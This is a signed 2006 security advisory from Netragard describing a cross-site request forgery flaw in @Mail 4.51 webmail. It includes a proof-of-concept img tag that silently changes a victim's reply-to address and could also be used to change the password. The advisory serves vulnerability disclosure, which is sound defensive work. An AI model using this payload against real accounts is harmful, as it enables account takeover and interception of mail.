-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard,  L.L.C  Advisory* *******************
ATMAIL-XRRF-ADVISORY-20061218

      
                     Strategic Reconnaissance Team

              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."



[POSTING NOTICE]
- ----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research
</a>





[About Netragard]
- ----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools.  This advisory is the
product of research done by the Strategic Reconnaissance Team.





[Advisory Information]
- ----------------------------------------------------------------------
Contact        : Adriel T. Desautels
Researcher      : Philippe C. Caturegli
Advisory ID      : NETRAGARD-20061218
Product Name      : @ Mail
Product Version      : 4.51
Vendor Name      : Calacode
Type of Vulnerability    : Cross Site Request Forgery
Effort        : Easy

- ----------------------------------------------------------------------
Netragard Security Note:

Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.





[Product Description]
- ----------------------------------------------------------------------
"@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device."


- --http://www.atmail.com--





[Technical Summary]
- ----------------------------------------------------------------------
It is possible to take control of an @Mail webmail email account
by exploiting a Cross Site Request Forgery (XRSF) vulnerability in
the @Mail webmail product. An attacker can send a specially crafted
email to any @Mail webmail user with a forged "img" tag. This forged
tag, if crafted properly, will inject new settings into the @Mail
webmail users account.

Example:
http://server/webmail/util.pl?func=settings&<forged settings in here>





[Technical Details]
- ----------------------------------------------------------------------
Netragard has discovered a critical flaw in @Mail webmail that allows
an attacker to change arbitrary settings in a users @Mail webmail
account. This flaw targets the util.pl page that is used to manage a
users account settings.

By default this page uses "HTTP POST" to commit changes. Netragard has
found that it is also possible to commit settings changes using an "HTTP
GET".

@Mail webmail's default configuration is to disable the display of
images for users that are not in the current accounts address book.
Users contained in the address book are considered to be trusted.

@Mail webmail's image loading security feature can be circumvented
by using specially crafted "img" tags embedded in emails sent to
@Mail webmail users. In fact, when an external image is referenced
by using the "img" tag, @Mail webmail automatically retrieves the
image and loads the image as a part of the email.

If the "img" tag is replaced by a specially crafted URL then an
attacker can commit changes to the targeted @Mail webmail email
account.





[Proof Of Concept]
- ----------------------------------------------------------------------
The below example changes the reply to address of the victim to
attacker@haxor.org. Similar attacks can be used to change other user
settings including the users password.

  
<img src=http://victim.com/atmail/webmail/util.pl?func=settings&save=1&
RealName=&ReplyTo=attacker%40hax0r.org&MboxOrder=id&EmailHeaders=Standard&
FontStyle=Verdana&Language=english&LeaveMsgs=1&Refresh=1200&MsgNum=25&
TimeFormat=%25l%3A%25M+%25p&DateFormat=%25e%2F%25m%2F%25y&TimeZone=
America%2FNew_York&EmailEncoding=UTF8&DisplayImages=2&AutoComplete=
1&Advanced=1&HtmlEditor=1&Signature=&save=Save+Settings&AutoReply=&
PKIenable=1&PGPenable=0&SMIMEtown=&SMIMEstate=&SMIMEcountry=&PGPpassword=
&PGPpasswordconfirm=&LoginType=xul&PrimaryColor=%23EBE9E4&SecondaryColor=%
23F4F4F4&ThirdColor=%23FAFAFA&HeaderColor=%23F5F5F5&HeadColor=%2306082C&
BgColor=%23F9F9F9&TextColor=%2306082C&TextHeadColor=%23303030&LinkColor=%
23000000&VlinkColor=%23000033&OnColor=%23F3F3F3&OffColor=%23FFFFFF&
SelectColor=%23E4EEF8&TopBg=imgs%2Fgraygrad.g>





[Vendor Status]
- ----------------------------------------------------------------------
Vendor Notified on 12/18/06





[Disclaimer]
- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com">http://www.netragard.com</a>

ATMAIL-XRRF-ADVISORY-20061218
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFFuP0wQwbn1P9Iaa0RAg8CAJ4thu1UwYcCsOFEVhgXj/qIfl8jdwCgj4qU
aPyOWeEM04jHcSvk6N5CYPg=
=kHn7
-----END PGP SIGNATURE-----